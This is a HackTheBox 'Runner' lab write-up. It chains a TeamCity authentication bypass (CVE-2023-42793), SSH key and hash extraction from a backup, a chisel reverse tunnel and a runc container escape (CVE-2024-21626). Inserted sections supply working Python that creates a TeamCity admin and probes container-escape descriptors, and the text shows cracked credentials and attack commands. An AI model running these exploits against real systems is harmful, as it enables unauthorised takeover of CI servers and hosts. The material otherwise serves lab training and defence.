Hackthebox: Runner

Foued SAIDI

Overview

Runner is a medium-difficulty Linux machine from HackTheBox. We start by exploiting an authentication bypass in TeamCity (CVE-2023-42793) to create an administrator account, pull an SSH private key out of a server backup and use it to get a shell and the user flag. We then port-forward an internal Portainer instance, log in with a reused password, and abuse CVE-2024-21626 (a runc container escape) to read the root flag from the host filesystem.

[Image: Runner info card]

Reconnaissance

Nmap

```
PS C:\Users\0xkujen\OneDrive\Bureau\HackThebox\HTB_Machines\Runner> nmap -A -Pn 10.129.202.190
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-23 21:09 W. Central Africa Standard Time
NSOCK ERROR [0.2660s] ssl_init_helper(): OpenSSL legacy provider failed to load.

Nmap scan report for 10.129.202.190
Host is up (0.29s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8000/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=8/23%OT=22%CT=1%CU=35190%PV=Y%DS=2%DC=T%G=Y%TM=66C8ECF
OS:C%P=i686-pc-windows-windows)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(CI=Z%II=I)SEQ(CI=Z%II=I%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M
OS:54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE8
OS:8%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y
OS:%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPC
OS:K=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 976.00 ms 10.10.16.1
2 174.00 ms 10.129.202.190

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.53 seconds
```

So we have OpenSSH on port 22, nginx on port 80 redirecting to runner.htb, and a service on port 8000 that nmap labels Nagios NSCA but which actually answers plain-text HTTP (note the text/plain http-title), so it is worth treating as a web port too.

Web Application - http://10.129.202.190

Navigating to http://10.129.202.190 redirects us to the runner.htb domain, so we add an entry for it to our /etc/hosts file.

[Image: Web app on port 80]

This looks like a static brochure site with no interactive features, so we move on to virtual-host enumeration.

Subdomain Enumeration

```
PS C:\Users\0xkujen\Tools\ffuf> .\ffuf.exe -w ..\SecLists\Discovery\DNS\bitquark-subdomains-top100000.txt -H "Host: FUZZ.runner.htb" -u "http://10.129.202.190" -fs 154

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://10.129.202.190
:: Wordlist : FUZZ: C:\Users\0xkujen\Tools\SecLists\Discovery\DNS\bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.runner.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 154
________________________________________________

teamcity [Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 743ms]
```

The `-fs 154` filter drops the default virtual host's response, leaving a single hit: a teamcity virtual host that answers 401, so it is protected by authentication. We add teamcity.runner.htb to /etc/hosts as well and check what it has for us.

TeamCity - http://teamcity.runner.htb/login.html

TeamCity is a Continuous Integration and Deployment server that provides out-of-the-box continuous unit testing, code quality analysis, and early reporting on build problems.

[Image: TeamCity login page]

CVE-2023-42793

The login page reports version 2023.05.3, which is affected by CVE-2023-42793, an authentication bypass (fixed in 2023.05.4) that lets an unauthenticated client mint an access token for the built-in administrator and, from there, create users or run code on the server. A public exploit for it creates an admin account for us to log in with:

```
PS C:\Users\0xkujen\OneDrive\Bureau\HackThebox\HTB_Machines\Runner> python3 .\TEAMCITY_EXPLOIT.py -u http://teamcity.runner.htb

=====================================================
* CVE-2023-42793 *
* TeamCity Admin Account Creation *
* *
* Author: ByteHunter *
=====================================================

Token: eyJ0eXAiOiAiVENWMiJ9.NTd0QktXa0JHTmpUVEgwcXptUUc3RzBTdl9v.MDVhNjVkNDAtZTVjNi00NzYzLThjYTYtYTVjNTExNDVkYzU1
Successfully exploited!
URL: http://teamcity.runner.htb
Username: city_adminBkh8
Password: Main_password!!**
```

We use those credentials and we are in!
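To make the bypass above concrete, here is an added example (my own code, not the ByteHunter script the writeup ran) that walks through the same three requests: the unauthenticated DELETE and POST to the `RPC2` token path of user `id:1`, then user creation with the resulting bearer token. It also includes a version check against the fixed release and the request pattern a defender would hunt for in nginx or TeamCity access logs. The target URL, the username and password passed on the command line, and the email address are assumptions; the XML token response shape and the `SYSTEM_ADMIN` role payload follow the public analysis of the bug.

```python
"""CVE-2023-42793 (TeamCity < 2023.05.4): version check, token bypass, admin
creation, and a log signature for defenders.  Added example, not the exploit
script the writeup ran; target URL and account details are supplied by the caller.
"""
import base64
import json
import re
import urllib.error
import urllib.request

FIXED_VERSION = (2023, 5, 4)   # first release that closes the bypass
# The auth interceptor let any path ending in /RPC2 through unauthenticated, so
# the token sub-resource of user id:1 (the first, built-in admin) was reachable.
RPC2_TOKEN_PATH = "/app/rest/users/id:1/tokens/RPC2"


def version_tuple(text):
    """'2023.05.3' or '2023.05.4 (build 129513)' -> (2023, 5, 3) / (2023, 5, 4)."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"no version in {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable(version_text):
    return version_tuple(version_text) < FIXED_VERSION


def admin_user_payload(username, password, email):
    """Body for POST /app/rest/users that yields a global system administrator."""
    return {
        "username": username,
        "password": password,
        "email": email,
        "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]},
    }


def extract_token(body):
    """Pull the token value out of the XML (default) or JSON token response."""
    body = body.strip()
    if body.startswith("{"):
        return json.loads(body)["value"]
    m = re.search(r'value="([^"]+)"', body)
    if not m:
        raise ValueError("no token value in response")
    return m.group(1)


def token_type(token):
    """First dot-separated segment of a TeamCity token is base64 JSON ({"typ": ...})."""
    seg = token.split(".")[0]
    return json.loads(base64.b64decode(seg + "=" * (-len(seg) % 4)))["typ"]


def _request(base_url, method, path, headers=None, body=None):
    req = urllib.request.Request(base_url.rstrip("/") + path, data=body,
                                 method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def create_admin(base_url, username, password, email="nobody@example.invalid"):
    """Run the bypass against a live server (network; hypothetical target URL)."""
    # 1. A token named RPC2 may already exist, which would make step 2 fail.
    _request(base_url, "DELETE", RPC2_TOKEN_PATH)        # 204 or 404, both fine
    # 2. Mint a token for user id:1 without any credentials.
    status, body = _request(base_url, "POST", RPC2_TOKEN_PATH)
    if status != 200:
        raise RuntimeError(f"token request returned {status}; patched server?")
    token = extract_token(body)
    # 3. Use it as a bearer token to add a SYSTEM_ADMIN user.
    status, body = _request(
        base_url, "POST", "/app/rest/users",
        headers={"Authorization": f"Bearer {token}",
                 "Content-Type": "application/json", "Accept": "application/json"},
        body=json.dumps(admin_user_payload(username, password, email)).encode())
    if status != 200:
        raise RuntimeError(f"user creation returned {status}: {body[:200]}")
    return token


# Defender side: the same two requests are what to hunt for in access logs.
ATTACK_PATH_RE = re.compile(r"/app/rest/users/[^/\s]+/tokens/RPC2\b")


def is_token_bypass_request(method, path):
    return method.upper() in ("POST", "DELETE") and bool(ATTACK_PATH_RE.search(path))


if __name__ == "__main__":
    import sys
    url, user, pw = sys.argv[1:4]   # e.g. http://teamcity.runner.htb city_adminXXXX 'Str0ng!pass'
    print("token:", create_admin(url, user, pw))
```

The DELETE in step 1 matters: TeamCity refuses to create a second token with the same name, so a re-run (or another tester's earlier attempt) would otherwise fail. Note that the token from the writeup starts with `eyJ0eXAiOiAiVENWMiJ9`, which is just base64 for `{"typ": "TCV2"}`, so that prefix is a handy grep for leaked TeamCity tokens.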

[Image: TeamCity admin access]

In the Administration panel there is a Backup option. No previous backups exist, but we can create one ourselves, and a full backup includes the server configuration and database dump.

[Image: Backup creation]

Unpacking the backup, we find an interesting id_rsa file under \config\projects\AllProjects\pluginData\ssh_keys, but nothing that says which account it belongs to.

A users file inside the database dump gives us some usernames:

```
PS C:\Users\0xkujen> cat .\database_dump\users
ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, [email protected], 1724498446610, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em, Matthew, [email protected], 1709150421438, BCRYPT
11, city_adminx5ny, $2a$07$C9n55BiJLp3MuWZE3npKKuM1nEWDcTshJ9m27ZhrD/ECrrQ0w6DX2, , angry-admin@funnybunny.org, , BCRYPT
12, city_adminbkh8, $2a$07$a78P6w8OuQei.ZPEg/Hpru9dy/JFvFT5ghpaYpzDqtsq0P01XmVSq, , angry-admin@funnybunny.org, 1724510336022, BCRYPT
PS C:\Users\0xkujen>
```

Cracking these bcrypt hashes (cost factor 7, so cheap enough to brute-force with a wordlist), we recover Matthew's password piper123, but it does not work for SSH.

The admin row carries the display name John, so we try the names from the dump against the private key and get a hit for john, along with the user flag:

```
kujen@kujen:~$ chmod 600 id_rsa
kujen@kujen:~$ ssh john@runner.htb -i id_rsa
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-102-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Sat Aug 24 03:07:16 PM UTC 2024

System load: 0.46044921875
Usage of /: 81.1% of 9.74GB
Memory usage: 37%
Swap usage: 0%
Processes: 224
Users logged in: 0
IPv4 address for br-21746deff6ac: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.129.202.190
IPv6 address for eth0: dead:beef::250:56ff:feb0:18e1


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

john@runner:~$ cat user.txt
b1fc7c92faff67******************
john@runner:~$
```

Privilege Escalation

The docker0 and br-* interfaces in the login banner already hint at containers on the box. Listing listening sockets, several services are bound to localhost only: 8111 is TeamCity's default port (nginx proxies it), 9000 and 9443 are Portainer's default HTTP and HTTPS ports, and 5005 is the conventional Java remote-debug (JDWP) port. Port 9000 is the interesting one:

```
john@runner:~$ netstat -anot
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:5005 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:9443 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8111 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 1 10.129.202.190:32934 1.1.1.1:53 SYN_SENT on (2.55/2/0)
tcp 0 172 10.129.202.190:22 10.10.x.x:55578 ESTABLISHED on (0.11/0/0)
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::8000 :::* LISTEN off (0.00/0/0)
john@runner:~$
```

We use chisel to forward port 9000 back to our attacking machine (the chisel server is started first; the client on the victim then opens a reverse tunnel so our local 9000 reaches the target's 127.0.0.1:9000):

Victim

```
john@runner:/tmp$ ./chisel client 10.10.x.x:4444 R:9000:127.0.0.1:9000
2024/08/24 15:38:31 client: Connecting to ws://10.10.x.x:4444
2024/08/24 15:38:34 client: Connected (Latency 125.385219ms)
```

Attacker

```
┌──(kali㉿kali)-[~/Downloads]
└─$ ./chisel server -port 4444 -reverse
2024/08/24 11:35:55 server: Reverse tunnelling enabled
2024/08/24 11:35:55 server: Fingerprint N+9a9kFpTk0bIn+Wf9CDdhRm/8rCxgrwEcQk4UxhADo=
2024/08/24 11:35:55 server: Listening on http://0.0.0.0:4444
2024/08/24 11:35:58 server: session#1: tun: proxy#R:9000=>9000: Listening
```

Opening http://127.0.0.1:9000 in a browser, we are greeted by Portainer:

[Image: Portainer portal]

Portainer is your container management software to deploy, troubleshoot, and secure applications across cloud, datacenter, and Industrial IoT use cases.

Matthew's cracked password is reused here: logging in as matthew with piper123 works:

[Image: Portainer login]

Inside Portainer we can see a couple of Docker images present on the host:

[Image: Docker images]

We want to use the ubuntu:latest image to get a shell, but a shell inside a container is not enough; we need to reach the host.

CVE-2024-21626 ("Leaky Vessels", runc before 1.1.12) fits: runc leaks an open file descriptor for a host directory (the host's /sys/fs/cgroup) into the container's init process, and it does not verify that the requested working directory lies inside the container's root. Setting the working directory to /proc/self/fd/<N>, where N is that leaked descriptor, therefore gives the container's first process a cwd on the host filesystem, from which `..` walks up to the host's /. So in Portainer we create a container from the ubuntu:latest image with the working directory set to /proc/self/fd/8. The exact descriptor number depends on the runc build and how the container is launched; 8 is what worked here, and trying the neighbouring numbers is normal if the container fails to start.

[Image: CVE-2024-21626 container creation in Portainer]

Once the container is created, we open its console from Portainer. The process runs as root with its working directory on the host filesystem, so walking up with ../../.. exposes the host's files, including /root and the root flag:

[Image: CVE-2024-21626 root flag from the container console]
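As an added example (my own code, not the author's), here is a small script that turns the escape above into something repeatable: a check of a runc version string against the fixed release, and a `docker run` probe that sets the working directory to `/proc/self/fd/<N>` for a range of candidate descriptors and reports the first one whose cwd actually landed on the host. It assumes a local Docker daemon and the ubuntu:latest image being present (as on this box); the descriptor range and the hostname comparison are my choices, not part of the original writeup.

```python
"""CVE-2024-21626 ("Leaky Vessels", runc < 1.1.12) helpers: version check and a
working-directory escape probe.  Added example, not the author's own code.
Assumes a local Docker daemon and the ubuntu:latest image when probe() is run.
"""
import re
import subprocess

FIXED = (1, 1, 12)   # first upstream runc release with the fix


def runc_version(text):
    """Accepts 'runc --version' output, 'v1.1.11', or '1.1.11-0ubuntu1'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no runc version in {text!r}")
    return tuple(int(x) for x in m.groups())


def runc_vulnerable(text):
    """Upstream version compare only; distro backports can carry the fix
    under an older number (Ubuntu shipped it as 1.1.7-0ubuntu1~22.04.2), so
    treat a True here as a hint and confirm with probe()."""
    return runc_version(text) < FIXED


# The leaked descriptor points at the host's /sys/fs/cgroup, two levels below
# the host root; extra '..' components stop at / and are harmless.
HOST_ROOT = "../../../../../../../.."

# Print the container's own hostname, then the file reached through the cwd.
PROBE_SCRIPT = f"cat /etc/hostname; cat {HOST_ROOT}/etc/hostname"


def escape_command(fd, image="ubuntu:latest"):
    """docker run line equivalent to Portainer's 'working dir' field (-w)."""
    return ["docker", "run", "--rm", "-w", f"/proc/self/fd/{fd}", image,
            "sh", "-c", PROBE_SCRIPT]


def escaped(stdout):
    """Return the host hostname if the two names differ, i.e. cwd is outside
    the container; None if the read failed or only saw the container's own file."""
    lines = stdout.split()
    if len(lines) == 2 and lines[0] != lines[1]:
        return lines[1]
    return None


def probe(fds=range(4, 10), image="ubuntu:latest"):
    """Try each candidate descriptor; return (fd, host hostname) on escape.

    With a fixed runc the container either fails to start (descriptor closed,
    chdir fails) or is rejected for a cwd outside the rootfs, so None comes back.
    Descriptor numbers 7 to 9 are the usual hits; 8 worked on this box.
    """
    for fd in fds:
        res = subprocess.run(escape_command(fd, image), capture_output=True,
                             text=True, timeout=60)
        if res.returncode == 0:
            host = escaped(res.stdout)
            if host:
                return fd, host
    return None


if __name__ == "__main__":
    out = subprocess.run(["runc", "--version"], capture_output=True, text=True)
    print("runc affected by version:", runc_vulnerable(out.stdout) if out.returncode == 0 else "unknown")
    print("escape probe:", probe())
```

The hostname comparison is the part worth keeping: a relative path that resolves at all is not proof of an escape, because a descriptor that happens to reference a directory inside the container would also make `cat ../../../../../../../../etc/hostname` succeed, just against the container's own file. Only a different hostname shows the cwd really is on the host.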

And that was it for this writeup! Thanks for reading!
-0xkujen

  • Title: Hackthebox: Runner
  • Author: Foued SAIDI
  • Created at : 2024-08-24 17:00:00
  • Updated at : 2024-08-24 18:33:54
  • Link: https://kujen5.github.io/2024/08/24/Hackthebox-Runner/
  • License: This work is licensed under CC BY-NC-SA 4.0.